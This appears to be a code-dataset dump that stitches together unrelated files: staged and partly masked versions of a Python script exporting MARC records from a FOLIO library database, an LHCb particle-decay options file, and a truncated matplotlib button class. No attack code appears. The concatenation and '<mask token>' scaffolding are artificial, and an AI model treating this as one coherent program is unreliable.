item.get('callnumber', 'na')\n prefix = item.get('prefix', None)\n if prefix is not None:\n callNoToUse = prefix + ' ' + callNoToUse\n record.add_field(Field(tag='952', indicators=[\n ' ', ' '], subfields=['m', item.get(\n 'barcode', ''), 'j', callNoTypeLookup.get(\n item.get('callnotype', ''), ''), 'd',\n locLookup.get(item.get(\n 'effectivelocationid'), ''), 'i',\n materialTypeLookup.get(item.get(\n 'materialtypeid'), ''), 'e', callNoToUse]))\n if len(record.leader) < 24:\n logging.error('BAD LEADER' + record.leader +\n ' ' + str(row))\n record.leader = '{:<24}'.format(record.leader)\n writer.write(record.as_json())\n writer.write('\\n')\n except Exception as e:\n print('ERROR PROCESSING ROW:' + str(row))\n print(e)\n if rowInstanceId == None:\n rowInstanceId = 'None'\n logging.error('UNABLE TO WRITE TO FILE: ' + rowInstanceId)\n logging.error(e)\n continue\n writer.close()\n else:\n print('in the else --> finishing')\n break\nif folio_db:\n cursor.close()\n marcRecordCursor.close()\n folio_db.close()\n print('complete')\n",
"step-3": "<mask token>\nprint('...starting export')\ntimestr = time.strftime('%Y%m%d-%H%M%S')\nlogging.basicConfig(filename=timestr + '-export.log')\nDATABASE_HOST = 'redacted'\nDATABASE_USERNAME = 'redacted'\nDATABASE_PASSWORD = 'redacted'\nDATABASE_PORT = 5432\nDATABASE_NAME = 'redacted'\nTENANT = 'redacted'\ncount = 0\nfolio_db = psycopg2.connect(user=DATABASE_USERNAME, password=\n DATABASE_PASSWORD, host=DATABASE_HOST, port=DATABASE_PORT, database=\n DATABASE_NAME)\nmaterialTypeLookup = {}\nmatCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_mat = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type\"\"\"\n .format(TENANT))\nmatCursor.execute(select_all_mat)\nmaterialTypes = matCursor.fetchall()\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\nlocLookup = {}\nlocCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_loc = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.location\"\"\"\n .format(TENANT))\nlocCursor.execute(select_all_loc)\nlocations = locCursor.fetchall()\nfor l in locations:\n locLookup[l['id']] = l['name']\ncallNoTypeLookup = {}\ncallNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_call_no_types = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type\"\"\"\n .format(TENANT))\ncallNoTypeCursor.execute(select_all_call_no_types)\ncallNoTypes = callNoTypeCursor.fetchall()\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\ncursor = folio_db.cursor(name='folio', cursor_factory=psycopg2.extras.\n DictCursor)\ncursor.itersize = 300000\nselect_ids_sql = (\n \"\"\"\nselect\nid, \ninstance_id \nfrom {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)\"\"\"\n .format(TENANT, \"'ACTUAL'\"))\nprint('executing query')\ncursor.execute(select_ids_sql)\nwhile True:\n print('in the while true - fetching...')\n rows = cursor.fetchmany(cursor.itersize)\n print('fetch is done')\n marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.\n DictCursor)\n if rows:\n save_file = timestr + '.' + str(count) + '.json'\n writer = open(save_file, 'wt')\n print('created the file: ' + save_file)\n count += 1\n for row in rows:\n try:\n rowId = row['id']\n rowInstanceId = row['instance_id']\n if rowInstanceId == None:\n logging.error('BAD RECORD: INSTANCE ID WAS NULL' + str(row)\n )\n continue\n select_record_sql = (\n \"\"\"\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1\"\"\"\n .format(TENANT, rowId))\n marcRecordCursor.execute(select_record_sql)\n marcRow = marcRecordCursor.fetchone()\n marcJsonAsString = json.dumps(marcRow['marc'])\n marcString = marcJsonAsString.encode('utf-8').strip()\n for record in JSONReader(marcJsonAsString):\n if record['6xx'] is not None:\n logging.error('BAD RECORD: 6xx' + str(row))\n continue\n if record['4xx'] is not None:\n logging.error('BAD RECORD: 4xx' + str(row))\n continue\n select_holding_sql = (\n \"\"\"\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowInstanceId))\n marcRecordCursor.execute(select_holding_sql)\n holdingRows = marcRecordCursor.fetchall()\n for holding in holdingRows:\n holdingsStatements = holding['holdingstatements']\n rowHoldingsId = holding['id']\n newField = Field(tag='998', indicators=[' ', ' '],\n subfields=['a', holding.get('callnumber', ''),\n 'l', locLookup.get(holding.get(\n 'permanentlocationid', ''), '')])\n for statement in holdingsStatements:\n if statement is not None:\n newField.add_subfield('s', statement.get(\n 'statement', '').replace(\n 'Extent of ownership:', ''))\n record.add_field(newField)\n select_item_sql = (\n \"\"\"\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowHoldingsId))\n marcRecordCursor.execute(select_item_sql)\n itemRows = marcRecordCursor.fetchall()\n for item in itemRows:\n callNoToUse = item.get('callnumber', 'na')\n prefix = item.get('prefix', None)\n if prefix is not None:\n callNoToUse = prefix + ' ' + callNoToUse\n record.add_field(Field(tag='952', indicators=[\n ' ', ' '], subfields=['m', item.get(\n 'barcode', ''), 'j', callNoTypeLookup.get(\n item.get('callnotype', ''), ''), 'd',\n locLookup.get(item.get(\n 'effectivelocationid'), ''), 'i',\n materialTypeLookup.get(item.get(\n 'materialtypeid'), ''), 'e', callNoToUse]))\n if len(record.leader) < 24:\n logging.error('BAD LEADER' + record.leader +\n ' ' + str(row))\n record.leader = '{:<24}'.format(record.leader)\n writer.write(record.as_json())\n writer.write('\\n')\n except Exception as e:\n print('ERROR PROCESSING ROW:' + str(row))\n print(e)\n if rowInstanceId == None:\n rowInstanceId = 'None'\n logging.error('UNABLE TO WRITE TO FILE: ' + rowInstanceId)\n logging.error(e)\n continue\n writer.close()\n else:\n print('in the else --> finishing')\n break\nif folio_db:\n cursor.close()\n marcRecordCursor.close()\n folio_db.close()\n print('complete')\n",
"step-4": "import pymarc\nfrom pymarc import JSONReader, Field, JSONWriter, XMLWriter\nimport psycopg2\nimport psycopg2.extras\nimport time\nimport logging\nimport json\nprint('...starting export')\ntimestr = time.strftime('%Y%m%d-%H%M%S')\nlogging.basicConfig(filename=timestr + '-export.log')\nDATABASE_HOST = 'redacted'\nDATABASE_USERNAME = 'redacted'\nDATABASE_PASSWORD = 'redacted'\nDATABASE_PORT = 5432\nDATABASE_NAME = 'redacted'\nTENANT = 'redacted'\ncount = 0\nfolio_db = psycopg2.connect(user=DATABASE_USERNAME, password=\n DATABASE_PASSWORD, host=DATABASE_HOST, port=DATABASE_PORT, database=\n DATABASE_NAME)\nmaterialTypeLookup = {}\nmatCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_mat = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type\"\"\"\n .format(TENANT))\nmatCursor.execute(select_all_mat)\nmaterialTypes = matCursor.fetchall()\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\nlocLookup = {}\nlocCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_loc = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.location\"\"\"\n .format(TENANT))\nlocCursor.execute(select_all_loc)\nlocations = locCursor.fetchall()\nfor l in locations:\n locLookup[l['id']] = l['name']\ncallNoTypeLookup = {}\ncallNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_call_no_types = (\n \"\"\"\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type\"\"\"\n .format(TENANT))\ncallNoTypeCursor.execute(select_all_call_no_types)\ncallNoTypes = callNoTypeCursor.fetchall()\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\ncursor = folio_db.cursor(name='folio', cursor_factory=psycopg2.extras.\n DictCursor)\ncursor.itersize = 300000\nselect_ids_sql = (\n \"\"\"\nselect\nid, \ninstance_id \nfrom {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)\"\"\"\n .format(TENANT, \"'ACTUAL'\"))\nprint('executing query')\ncursor.execute(select_ids_sql)\nwhile True:\n print('in the while true - fetching...')\n rows = cursor.fetchmany(cursor.itersize)\n print('fetch is done')\n marcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.\n DictCursor)\n if rows:\n save_file = timestr + '.' + str(count) + '.json'\n writer = open(save_file, 'wt')\n print('created the file: ' + save_file)\n count += 1\n for row in rows:\n try:\n rowId = row['id']\n rowInstanceId = row['instance_id']\n if rowInstanceId == None:\n logging.error('BAD RECORD: INSTANCE ID WAS NULL' + str(row)\n )\n continue\n select_record_sql = (\n \"\"\"\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1\"\"\"\n .format(TENANT, rowId))\n marcRecordCursor.execute(select_record_sql)\n marcRow = marcRecordCursor.fetchone()\n marcJsonAsString = json.dumps(marcRow['marc'])\n marcString = marcJsonAsString.encode('utf-8').strip()\n for record in JSONReader(marcJsonAsString):\n if record['6xx'] is not None:\n logging.error('BAD RECORD: 6xx' + str(row))\n continue\n if record['4xx'] is not None:\n logging.error('BAD RECORD: 4xx' + str(row))\n continue\n select_holding_sql = (\n \"\"\"\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowInstanceId))\n marcRecordCursor.execute(select_holding_sql)\n holdingRows = marcRecordCursor.fetchall()\n for holding in holdingRows:\n holdingsStatements = holding['holdingstatements']\n rowHoldingsId = holding['id']\n newField = Field(tag='998', indicators=[' ', ' '],\n subfields=['a', holding.get('callnumber', ''),\n 'l', locLookup.get(holding.get(\n 'permanentlocationid', ''), '')])\n for statement in holdingsStatements:\n if statement is not None:\n newField.add_subfield('s', statement.get(\n 'statement', '').replace(\n 'Extent of ownership:', ''))\n record.add_field(newField)\n select_item_sql = (\n \"\"\"\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)\"\"\"\n .format(TENANT, rowHoldingsId))\n marcRecordCursor.execute(select_item_sql)\n itemRows = marcRecordCursor.fetchall()\n for item in itemRows:\n callNoToUse = item.get('callnumber', 'na')\n prefix = item.get('prefix', None)\n if prefix is not None:\n callNoToUse = prefix + ' ' + callNoToUse\n record.add_field(Field(tag='952', indicators=[\n ' ', ' '], subfields=['m', item.get(\n 'barcode', ''), 'j', callNoTypeLookup.get(\n item.get('callnotype', ''), ''), 'd',\n locLookup.get(item.get(\n 'effectivelocationid'), ''), 'i',\n materialTypeLookup.get(item.get(\n 'materialtypeid'), ''), 'e', callNoToUse]))\n if len(record.leader) < 24:\n logging.error('BAD LEADER' + record.leader +\n ' ' + str(row))\n record.leader = '{:<24}'.format(record.leader)\n writer.write(record.as_json())\n writer.write('\\n')\n except Exception as e:\n print('ERROR PROCESSING ROW:' + str(row))\n print(e)\n if rowInstanceId == None:\n rowInstanceId = 'None'\n logging.error('UNABLE TO WRITE TO FILE: ' + rowInstanceId)\n logging.error(e)\n continue\n writer.close()\n else:\n print('in the else --> finishing')\n break\nif folio_db:\n cursor.close()\n marcRecordCursor.close()\n folio_db.close()\n print('complete')\n",
"step-5": "import pymarc\nfrom pymarc import JSONReader, Field, JSONWriter, XMLWriter\nimport psycopg2\nimport psycopg2.extras\nimport time\nimport logging\nimport json\n\n#WRITTEN W/PYTHON 3.7.3\n\n\nprint(\"...starting export\");\n\n# constructing file and log name\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\nlogging.basicConfig(filename=timestr + \"-export.log\")\n\n#LOCAL DB\nDATABASE_HOST = \"redacted\"\nDATABASE_USERNAME = \"redacted\"\nDATABASE_PASSWORD = \"redacted\"\nDATABASE_PORT = 5432\nDATABASE_NAME = \"redacted\"\nTENANT = \"redacted\"\n\ncount = 0\nfolio_db = psycopg2.connect(\n\tuser=DATABASE_USERNAME,\n\tpassword=DATABASE_PASSWORD,\n\thost=DATABASE_HOST,\n\tport=DATABASE_PORT,\n\tdatabase=DATABASE_NAME\n)\n\n#init a list of material types\nmaterialTypeLookup = {}\nmatCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_mat = '''\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.material_type'''.format(TENANT)\nmatCursor.execute(select_all_mat)\nmaterialTypes = matCursor.fetchall()\nfor m in materialTypes:\n materialTypeLookup[m['id']] = m['name']\n\n#init a list of locations \nlocLookup = {}\nlocCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_loc = '''\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.location'''.format(TENANT)\nlocCursor.execute(select_all_loc)\nlocations = locCursor.fetchall()\nfor l in locations:\n locLookup[l['id']] = l['name']\n\n#init a list of call number types\ncallNoTypeLookup = {}\ncallNoTypeCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\nselect_all_call_no_types = '''\nselect id, jsonb->>'name' as name from {}_mod_inventory_storage.call_number_type'''.format(TENANT)\ncallNoTypeCursor.execute(select_all_call_no_types)\ncallNoTypes = callNoTypeCursor.fetchall()\nfor c in callNoTypes:\n callNoTypeLookup[c['id']] = c['name']\n\ncursor = folio_db.cursor(name='folio',cursor_factory=psycopg2.extras.DictCursor)\n#THIS COULD BE MODIFIED TO RETREIVE X NUMBER OF RECORDS PER FILE\ncursor.itersize=300000\n#from {}_mod_marc_storage.marc_record'''.format(TENANT)\nselect_ids_sql = '''\nselect\nid, \ninstance_id \nfrom {}_mod_source_record_storage.records_lb where state = {} and (suppress_discovery = False or suppress_discovery is null)'''.format(TENANT,\"'ACTUAL'\")\nprint(\"executing query\")\ncursor.execute(select_ids_sql)\nwhile True:\n\tprint(\"in the while true - fetching...\")\n\trows = cursor.fetchmany(cursor.itersize)\n\tprint(\"fetch is done\")\n\tmarcRecordCursor = folio_db.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\tif rows:\n\t\tsave_file = timestr + \".\" + str(count) + \".json\"\n\t\twriter = open(save_file,'wt')\n\t\tprint(\"created the file: \" + save_file)\n\t\tcount += 1\n\t\tfor row in rows:\n\t\t\ttry: \n\t\t\t\trowId = row['id'];\n\t\t\t\trowInstanceId = row['instance_id'];\n\t\t\t\tif rowInstanceId == None:\n\t\t\t\t\t\tlogging.error(\"BAD RECORD: INSTANCE ID WAS NULL\" + str(row))\n\t\t\t\t\t\tcontinue\n\t\t\t\tselect_record_sql = '''\n\t\t\t\tselect id, \n\t\t\t\tcontent as marc\n\t\t\t\tfrom {}_mod_source_record_storage.marc_records_lb where \n\t\t\t\tid = '{}' limit 1'''.format(TENANT, rowId)\n\t\t\t\t#print(select_record_sql)\n\t\t\t\tmarcRecordCursor.execute(select_record_sql)\n\t\t\t\tmarcRow = marcRecordCursor.fetchone()\n\t\t\t\tmarcJsonAsString = json.dumps(marcRow['marc'])\n\t\t\t\tmarcString = marcJsonAsString.encode('utf-8').strip()\n\t\t\t\t#print(marcJsonAsString);\n\t\t\t\tfor record in JSONReader(marcJsonAsString):\n\t\t\t\t\t#write MARC JSON to output file\n\t\t\t\t\t#ADD A 998 FOR EACH HOLDING RECORD\n\t\t\t\t\tif record['6xx'] is not None:\n\t\t\t\t\t\tlogging.error(\"BAD RECORD: 6xx\" + str(row))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif record['4xx'] is not None:\n\t\t\t\t\t\tlogging.error(\"BAD RECORD: 4xx\" + str(row))\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tselect_holding_sql = '''\n\t\t\t\t\tselect id, creation_date, callnumbertypeid, \n\t\t\t\t\tjsonb->>'permanentLocationId' as permanentlocationid, \n\t\t\t\t\tjsonb->'holdingsStatements' as holdingstatements,\n\t\t\t\t\tjsonb->>'callNumber' as callNumber from \n\t\t\t\t\t{}_mod_inventory_storage.holdings_record \n\t\t\t\t\twhere instanceid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowInstanceId)\n\t\t\t\t\t#print(select_holding_sql)\n\t\t\t\t\tmarcRecordCursor.execute(select_holding_sql)\n\t\t\t\t\tholdingRows = marcRecordCursor.fetchall()\n\t\t\t\t\tfor holding in holdingRows:\n\t\t\t\t\t\t#print(holding['callnumber'])\n\t\t\t\t\t\tholdingsStatements = holding['holdingstatements']\n\t\t\t\t\t\trowHoldingsId = holding['id']\n\t\t\t\t\t\tnewField = Field(tag = '998',\n\t\t\t\t\t\t\t\t indicators = [' ',' '],\n\t\t\t\t\t\t\t\t subfields = ['a',holding.get('callnumber',''),\n\t\t\t\t\t\t\t\t\t\t\t'l',locLookup.get(holding.get('permanentlocationid',''),'')])\n\t\t\t\t\t\tfor statement in holdingsStatements:\n\t\t\t\t\t\t\tif statement is not None:\n\t\t\t\t\t\t\t\tnewField.add_subfield('s',statement.get('statement','').replace('Extent of ownership:',''));\n\t\t\t\t\t\trecord.add_field(newField)\n\t\t\t\t\t\t#ADD AN 952 FOR EACH ITEM\n\t\t\t\t\t\tselect_item_sql = '''\n\t\t\t\t\t\tselect id, materialtypeid, \n\t\t\t\t\t\tjsonb->>'effectiveLocationId' as effectivelocationid, \n\t\t\t\t\t\tjsonb->>'barcode' as barcode, \n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'prefix' as prefix,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'typeId' as callnotype,\n\t\t\t\t\t\tjsonb->'effectiveCallNumberComponents'->>'callNumber' as callnumber\n\t\t\t\t\t\tfrom {}_mod_inventory_storage.item where \n\t\t\t\t\t\tholdingsrecordid = '{}' and (jsonb->>'discoverySuppress'='false' or jsonb->>'discoverySuppress' is null)'''.format(TENANT,rowHoldingsId)\n\t\t\t\t\t\t#print(select_item_sql)\n\t\t\t\t\t\tmarcRecordCursor.execute(select_item_sql)\n\t\t\t\t\t\titemRows = marcRecordCursor.fetchall()\n\t\t\t\t\t\tfor item in itemRows:\n\t\t\t\t\t\t\tcallNoToUse = item.get('callnumber','na')\n\t\t\t\t\t\t\t#print(callNoToUse)\n\t\t\t\t\t\t\tprefix = item.get('prefix',None)\n\t\t\t\t\t\t\tif (prefix is not None):\n\t\t\t\t\t\t\t\tcallNoToUse = prefix + \" \" + callNoToUse\n\t\t\t\t\t\t\trecord.add_field(\n\t\t\t\t\t\t\t\tField(tag = '952',\n\t\t\t\t\t\t\t\t\tindicators = [' ',' '],\n\t\t\t\t\t\t\t\t\tsubfields = ['m',item.get('barcode',''),\n\t\t\t\t\t\t\t\t\t'j',callNoTypeLookup.get(item.get('callnotype',''),''),\n\t\t\t\t\t\t\t\t\t'd',locLookup.get(item.get('effectivelocationid'),''),\n\t\t\t\t\t\t\t\t\t'i',materialTypeLookup.get(item.get('materialtypeid'),''),\n\t\t\t\t\t\t\t\t\t'e',callNoToUse]))\n\t\t\t\t\t\t\tif (len(record.leader) < 24):\n\t\t\t\t\t\t\t\tlogging.error(\"BAD LEADER\" + record.leader + \" \" + str(row))\n\t\t\t\t\t\t\t\trecord.leader = \"{:<24}\".format(record.leader)\n\t\t\t\t\twriter.write(record.as_json())\n\t\t\t\t\twriter.write('\\n')\n\t\t\texcept Exception as e:\n\t\t\t\t\tprint(\"ERROR PROCESSING ROW:\" + str(row))\n\t\t\t\t\tprint(e)\n\t\t\t\t\tif rowInstanceId == None:\n\t\t\t\t\t\trowInstanceId = \"None\" #FOR LOGGING\n\t\t\t\t\tlogging.error(\"UNABLE TO WRITE TO FILE: \" + rowInstanceId)\n\t\t\t\t\tlogging.error(e)\n\t\t\t\t\tcontinue\n\t\twriter.close()\n\telse:\n\t\tprint(\"in the else --> finishing\")\n\t\tbreak\n\nif (folio_db):\n\tcursor.close()\n\tmarcRecordCursor.close()\n\tfolio_db.close()\n\tprint(\"complete\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/16303437.py generated: Wed, 25 Jan 2017 15:25:22
#
# Event Type: 16303437
#
# ASCII decay Descriptor: [Xi_b- -> (rho- -> pi- pi0) K- p+]cc
#
from Configurables import Generation
Generation().EventType = 16303437
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 5132,-5132 ]
from Configurables import LHCb__ParticlePropertySvc
LHCb__ParticlePropertySvc().Particles = [ "Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000", "Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000" ]
|
normal
|
{
"blob_id": "7cc9d445d712d485eaebd090d2485dac0c38b3fb",
"index": 5918,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nGeneration().addTool(SignalRepeatedHadronization)\n<mask token>\nToolSvc().addTool(EvtGenDecay)\n<mask token>\n",
"step-3": "<mask token>\nGeneration().EventType = 16303437\nGeneration().SampleGenerationTool = 'SignalRepeatedHadronization'\n<mask token>\nGeneration().addTool(SignalRepeatedHadronization)\nGeneration().SignalRepeatedHadronization.ProductionTool = 'PythiaProduction'\n<mask token>\nToolSvc().addTool(EvtGenDecay)\nToolSvc().EvtGenDecay.UserDecayFile = (\n '$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec'\n )\nGeneration().SignalRepeatedHadronization.CutTool = 'DaughtersInLHCb'\nGeneration().SignalRepeatedHadronization.SignalPIDList = [5132, -5132]\n<mask token>\nLHCb__ParticlePropertySvc().Particles = [\n 'Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000',\n 'Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000']\n",
"step-4": "from Configurables import Generation\nGeneration().EventType = 16303437\nGeneration().SampleGenerationTool = 'SignalRepeatedHadronization'\nfrom Configurables import SignalRepeatedHadronization\nGeneration().addTool(SignalRepeatedHadronization)\nGeneration().SignalRepeatedHadronization.ProductionTool = 'PythiaProduction'\nfrom Configurables import ToolSvc\nfrom Configurables import EvtGenDecay\nToolSvc().addTool(EvtGenDecay)\nToolSvc().EvtGenDecay.UserDecayFile = (\n '$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec'\n )\nGeneration().SignalRepeatedHadronization.CutTool = 'DaughtersInLHCb'\nGeneration().SignalRepeatedHadronization.SignalPIDList = [5132, -5132]\nfrom Configurables import LHCb__ParticlePropertySvc\nLHCb__ParticlePropertySvc().Particles = [\n 'Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000',\n 'Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000']\n",
"step-5": "# file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/16303437.py generated: Wed, 25 Jan 2017 15:25:22\n#\n# Event Type: 16303437\n#\n# ASCII decay Descriptor: [Xi_b- -> (rho- -> pi- pi0) K- p+]cc\n#\nfrom Configurables import Generation\nGeneration().EventType = 16303437\nGeneration().SampleGenerationTool = \"SignalRepeatedHadronization\"\nfrom Configurables import SignalRepeatedHadronization\nGeneration().addTool( SignalRepeatedHadronization )\nGeneration().SignalRepeatedHadronization.ProductionTool = \"PythiaProduction\"\nfrom Configurables import ToolSvc\nfrom Configurables import EvtGenDecay\nToolSvc().addTool( EvtGenDecay )\nToolSvc().EvtGenDecay.UserDecayFile = \"$DECFILESROOT/dkfiles/Omegab_rho-h-p+,pi-pi0_PPChange=phsp,DecProdCut.dec\"\nGeneration().SignalRepeatedHadronization.CutTool = \"DaughtersInLHCb\"\nGeneration().SignalRepeatedHadronization.SignalPIDList = [ 5132,-5132 ]\nfrom Configurables import LHCb__ParticlePropertySvc\nLHCb__ParticlePropertySvc().Particles = [ \"Xi_b- 122 5132 -1.0 6.048 1.13e-012 Xi_b- 5132 0.000000e+000\", \"Xi_b~+ 123 -5132 1.0 6.071 1.1e-012 anti-Xi_b+ -5132 0.000000e+000\" ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 17/02/17 at 11:48 PM
@author: neil
Program description here
Version 0.0.1
"""
import matplotlib.pyplot as plt
from matplotlib.widgets import Button
import sys
# detect python version
# if python 3 do this:
if (sys.version_info > (3, 0)):
import tkinter
import tkinter.simpledialog as tksimpledialog
else:
import Tkinter as tkinter
import tkSimpleDialog as tksimpledialog
# =============================================================================
# Define Class. Methods and Functions
# =============================================================================
class Add_Buttons(object):
def __init__(self, ax=None, **kwargs):
"""
Adds a select rectangle feature to any matplotlib axis, with select,
clear all, and finish buttons
:param ax: matplotlib axis, the frame to add the selector to
:param kwargs: kwargs passed to the rectangle selector
Current allowed kwargs are:
button_labels - list of strings
defines the name of each button to be displayed
Must be of length 1 or greater
button_actions - list of strings
defines the action of each button. Must be same
length as button_labels
currently supported actions are:
"NEXT" - sends a return statement to move to
next plot
self.result set to 1
"PREVIOUS" - sends a return statement to move to
previous plot
self.result set to -1
"CLOSE" - closes the plot
"OPTION" - sends the button_label string
self.result set to button_label
"UINPUT" - asks user for an input
button_params - list of dictionaries (optional)
if defined must be same length as button_labels
a dictionary for each button
keywords of each dictionary:
"close" - when used with "OPTION" action will
close the plot after OPTION is clicked
"""
# set supported actions (and link to function)
self.actions = dict(NEXT=self.next,
PREVIOUS=self.previous,
CLOSE=self.end,
OPTION=self.option,
UINPUT=self.uinput)
self.supported_actions = list(self.actions.keys())
# current button params
self.buttons = []
self.regions = []
# result (1, 0, -1, or string)
self.result = 0
# storage
self.data = dict()
# Deal with having no matplotlib axis
if ax is None:
self.ax = plt.gca()
else:
self.ax = ax
# load keyword arguments
if kwargs is None:
kwargs = dict()
self.button_labels = kwargs.get('button_labels', ['Close'])
self.num_buttons = len(self.button_labels)
self.button_actions = kwargs.get('button_actions', ['CLOSE'])
dparams = [dict()]*self.num_buttons
self.button_params = kwargs.get('button_params', dparams)
# check inputs are correct
self.validate_inputs()
# create buttons
self.create_buttons()
def validate_inputs(self):
# Make sure button labels is in correct format
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError("Button labels must be a list of strings")
# Make sure button actions is in correct format
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError("Button labels must be a list of strings")
# Make sure button actions is in correct format
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError("Button params must be a dictionary")
# Make sure list are not empty and same length
if len(self.button_labels) < 1:
raise ValueError("'button_labels' Must have at least one button "
"label in list.")
if len(self.button_actions) != len(self.button_labels):
